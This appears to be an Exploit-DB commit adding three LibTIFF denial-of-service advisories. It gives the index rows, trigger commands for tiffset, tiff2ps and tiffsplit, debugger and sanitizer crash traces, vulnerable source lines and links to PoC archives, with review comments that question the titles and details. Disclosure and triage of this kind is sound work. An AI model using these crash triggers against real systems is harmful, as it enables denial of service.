DB: 2017-07-07

3 new exploits

LibTIFF - 'tif_dirwrite.c' Denial of Service
LibTIFF - 'tif_jbig.c' Denial of Service
LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read
Offensive Security 2017-07-07 05:01:20 +00:00
parent 9a0992d704
commit d3536f6bef
4 changed files with 223 additions and 0 deletions


@ -5605,6 +5605,9 @@ id,file,description,date,author,platform,type,port
42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
42285,platforms/android/dos/42285.txt,"LG MRA58K - 'ASFParser::SetMetaData' Stack Overflow",2017-06-30,"Google Security Research",android,dos,0
42286,platforms/multiple/dos/42286.txt,"Google Chrome - Out-of-Bounds Access in RegExp Stubs",2017-06-30,"Google Security Research",multiple,dos,0
42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
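Review bot: the three new rows record `platform` as `linux` although each description names a bug in the LibTIFF library itself, not in a Linux-specific component; the neighbouring row for Google Chrome (42286) uses `multiple` for exactly this situation, so `multiple` would be the consistent choice here (which also means the files would live under `platforms/multiple/dos/` rather than `platforms/linux/dos/`). Otherwise the rows are well-formed: authors containing a space are quoted, `zhangtan` is not, and the insertion point after the last existing `dos` entry matches the file's ordering.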


platforms/linux/dos/42299.txt Executable file

@ -0,0 +1,87 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2712
Triggered by "./tiffset POC1"
$ ./tiffset POC1
TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
poc3: AdobeDeflate compression support is not configured.
tiffset: tif_dirwrite.c:2127: int TIFFWriteDirectoryTagCheckedLong8Array(TIFF
*, uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *): Assertion
`tif->tif_flags&TIFF_BIGTIFF' failed.
Aborted
The gdb debugging information is listed below:
(gdb) set args POC1
(gdb) r
...
(gdb) c
Continuing.
TIFFReadDirectory: Warning, Unknown field with tag 302 (0x12e) encountered.
TIFFReadDirectory: Warning, Unknown field with tag 61961 (0xf209) encountered.
poc2: AdobeDeflate compression support is not configured.
Breakpoint 2, TIFFWriteDirectoryTagCheckedLong8Array (tif=<optimized out>,
ndir=<optimized out>, count=1,
value=0x615c20, dir=<optimized out>, tag=<optimized out>) at
tif_dirwrite.c:2127
2127 assert(tif->tif_flags&TIFF_BIGTIFF);
(gdb) bt
#0 0x00007ffff746a428 in __GI_raise (sig=sig@entry=6) at
../sysdeps/unix/sysv/linux/raise.c:54
#1 0x00007ffff746c02a in __GI_abort () at abort.c:89
#2 0x00007ffff7462bd7 in __assert_fail_base (fmt=<optimized out>,
assertion=assertion@entry=0x7ffff7baf949 "tif->tif_flags&TIFF_BIGTIFF",
file=file@entry=0x7ffff7baf5c0 "tif_dirwrite.c", line=line@entry=2127,
function=function@entry=0x7ffff7baf8e2 "int
TIFFWriteDirectoryTagCheckedLong8Array(TIFF *, uint32 *, TIFFDirEntry *,
uint16, uint32, uint64 *)") at assert.c:92
#3 0x00007ffff7462c82 in __GI___assert_fail (assertion=0x7ffff7baf949
"tif->tif_flags&TIFF_BIGTIFF",
file=0x7ffff7baf5c0 "tif_dirwrite.c", line=2127,
function=0x7ffff7baf8e2 "int TIFFWriteDirectoryTagCheckedLong8Array(TIFF *,
uint32 *, TIFFDirEntry *, uint16, uint32, uint64 *)") at assert.c:101
#4 0x00007ffff7b4e9cb in TIFFWriteDirectoryTagCheckedLong8Array (tif=0x615010,
ndir=<optimized out>, count=1,
value=0x615c20, dir=<optimized out>, tag=<optimized out>) at
tif_dirwrite.c:2127
#5 TIFFWriteDirectoryTagLong8Array (count=1, value=0x615c20, tif=<optimized
out>, ndir=<optimized out>,
dir=<optimized out>, tag=<optimized out>) at tif_dirwrite.c:1462
#6 TIFFWriteDirectorySec (tif=<optimized out>, isimage=<optimized out>,
imagedone=<optimized out>,
pdiroff=<optimized out>) at tif_dirwrite.c:746
#7 0x00007ffff7b4f6b5 in TIFFWriteDirectory (tif=0x615010) at
tif_dirwrite.c:184
#8 TIFFRewriteDirectory (tif=<optimized out>) at tif_dirwrite.c:360
#9 0x0000000000402bc7 in main (argc=<optimized out>, argv=<optimized out>) at
tiffset.c:344
Trigged in line tif_dirwrite.c:2127 at function
TIFFWriteDirectoryTagCheckedLong8Array()
2122 static int
2123 TIFFWriteDirectoryTagCheckedLong8Array(TIFF* tif, uint32* ndir,
TIFFDirEntry* dir, uint16 tag, uint32 count, uint64* value)
2124 {
2125 assert(count<0x20000000);
2126 assert(sizeof(uint64)==8);
2127 assert(tif->tif_flags&TIFF_BIGTIFF);
2128 if (tif->tif_flags&TIFF_SWAB)
2129 TIFFSwabArrayOfLong8(value,count);
2130
return(TIFFWriteDirectoryTagData(tif,ndir,dir,tag,TIFF_LONG8,count,count*8,value));
2131 }
[note]: Tiffset sets the value of a TIFF header to a specified value.It will
modify the raw POC file,so you'd better make a backup file every time you are
going to run.
Credits:
This vulnerability is detected by team OWL337, with our custom fuzzer collAFL.
Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need
more info about the team, the tool or the vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42299.zip
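Review bot: the reproduction steps are inconsistent about which test case is being run: the command is `./tiffset POC1`, the program output reads `poc3: AdobeDeflate compression support is not configured.`, and the gdb session reads `poc2: ...`, so a reader cannot tell which of three files the archive is meant to contain or which one reaches the assertion; use one name throughout. The advisory also lacks the `Affected version:` field that the sibling entry 42300 carries, which matters for triage since the failing check is `assert(tif->tif_flags&TIFF_BIGTIFF)` at `tif_dirwrite.c:2127` and line numbers drift between releases. The `[note]` that `tiffset` rewrites the input file in place belongs near the top rather than after the trace, because anyone who runs the command first loses the PoC. Minor: "Trigged in line" should read "Triggered at line".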

platforms/linux/dos/42300.txt Executable file

@ -0,0 +1,42 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2706
Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
Triggered by “./tiff2ps $POC” or “./tiff2pdf $POC”
The asan debug information is below:
$./tiff2ps $POC
=================================================================
==26627==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1792 byte(s) in 7 object(s) allocated from:
#0 0x7f7c4f1a19aa in malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
#1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
#2 0x3ea (<unknown module>)
Indirect leak of 170491316224 byte(s) in 223 object(s) allocated from:
#0 0x7f7c4f1a19aa in malloc
(/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989aa)
#1 0x7f7c4dca72fd (/usr/lib/x86_64-linux-gnu/libjbig.so.0+0x12fd)
#2 0x3ea (<unknown module>)
SUMMARY: AddressSanitizer: 170491318016 byte(s) leaked in 230 allocation(s).
Affected version:
<=the Latest version (4.0.8)
Credits:
This vulnerability is detected by team OWL337, with our custom fuzzer coll AFL.
Please contact ganshuitao@gmail.com and chaoz@tsinghua.edu.cn if you need more
info about the team, the tool or the vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42300.zip
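Review bot: the evidence shown does not support the title. The only frames in the LeakSanitizer report are `malloc`, an unsymbolized address inside `libjbig.so.0+0x12fd`, and `#2 0x3ea (<unknown module>)`; no frame in `tif_jbig.c` or any libtiff function appears, and the report is a leak summary rather than a crash, so from this text alone the defect could sit in libjbig rather than in LibTIFF's JBIG glue. The report should be regenerated against a symbolized debug build of libtiff so the libtiff call site is visible, or the title should be qualified. The "Indirect leak of 170491316224 byte(s) in 223 object(s)" figure (roughly 160 GiB) also deserves a sentence explaining where those sizes come from, since that is the part a maintainer would want to understand. Minor: the `Triggered by` line appears twice, and the fuzzer is spelled "coll AFL" here but "collAFL" in 42299.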

platforms/linux/dos/42301.txt Executable file

@ -0,0 +1,91 @@
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2693
On 4.0.7:
# tiffsplit $FILE
==2007== Invalid read of size 4
==2007== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
==2007== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
==2007== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
==2007== by 0x404CCF: tiffcp (tiffsplit.c:220)
==2007== by 0x404CCF: main (tiffsplit.c:89)
==2007== Address 0x0 is not stack'd, malloc'd or (recently) free'd
------- Comment #1 From zhangtan 2017-05-15 01:20:26 -------
The place of Out of bound read:
ret_val = 0;
for (i = 0; i < td->td_customValueCount; i++) {
TIFFTagValue *tv = td->td_customValues + i;
if (tv->info->field_tag != tag)
continue;
------- Comment #2 From zhangtan 2017-05-15 01:29:10 -------
The place of Out of bound read:
The 1072 line of tif_dir.c
1068 ret_val = 0;
1069 for (i = 0; i < td->td_customValueCount; i++) {
1070 TIFFTagValue *tv = td->td_customValues + i;
1071
1072 if (tv->info->field_tag != tag)
1073 continue;
As tv increased in 1070, Out of bound read happened in 1072 when the pointer tv
was referenced.
------- Comment #3 From zhangtan 2017-05-15 01:46:33 -------
PoC:
Detailed information of the bug can be reproduced using the valgrind tool:
# valgrind tiffsplit $File(the testcase in the attachment)
Error Message:
==23520== Invalid read of size 4
==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
==23520== by 0x404CCF: tiffcp (tiffsplit.c:220)
==23520== by 0x404CCF: main (tiffsplit.c:89)
==23520== Address 0x0 is not stack'd, malloc'd or (recently) free'd
==23520==
==23520==
==23520== Process terminating with default action of signal 11 (SIGSEGV)
==23520== Access not within mapped region at address 0x0
==23520== at 0x40CD1A: _TIFFVGetField (tif_dir.c:1072)
==23520== by 0x41B2C5: TIFFVGetField (tif_dir.c:1198)
==23520== by 0x41B2C5: TIFFGetField (tif_dir.c:1182)
==23520== by 0x404CCF: tiffcp (tiffsplit.c:220)
==23520== by 0x404CCF: main (tiffsplit.c:89)
==23520== If you believe this happened as a result of a stack
==23520== overflow in your program's main thread (unlikely but
==23520== possible), you can try to increase the size of the
==23520== main thread stack using the --main-stacksize= flag.
==23520== The main thread stack size used in this run was 8388608.
==23520==
==23520== HEAP SUMMARY:
==23520== in use at exit: 17,821 bytes in 42 blocks
==23520== total heap usage: 96 allocs, 54 frees, 59,223 bytes allocated
==23520==
==23520== LEAK SUMMARY:
==23520== definitely lost: 0 bytes in 0 blocks
==23520== indirectly lost: 0 bytes in 0 blocks
==23520== possibly lost: 0 bytes in 0 blocks
==23520== still reachable: 17,821 bytes in 42 blocks
==23520== suppressed: 0 bytes in 0 blocks
==23520== Rerun with --leak-check=full to see details of leaked memory
==23520==
==23520== For counts of detected and suppressed errors, rerun with: -v
==23520== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
Segmentation fault
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42301.zip
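Review bot: the classification "Out-of-Bounds Read" is not what the trace shows. Valgrind reports the invalid 4-byte read at `Address 0x0`, and the faulting statement at `tif_dir.c:1072` is `if (tv->info->field_tag != tag)`, which is consistent with `tv->info` being a NULL pointer in one of the `td_customValues` entries rather than with `tv` walking past the end of the array as Comment #2 claims ("As tv increased in 1070, Out of bound read happened"); a pointer that ran off the end of a heap array would land at a nonzero address. Either reconcile the explanation with the address or retitle the entry as a NULL pointer dereference. Comment #1 and Comment #2 paste the same snippet; keep only the line-numbered version. Minor: the same test case is referred to as `$FILE` and `$File`.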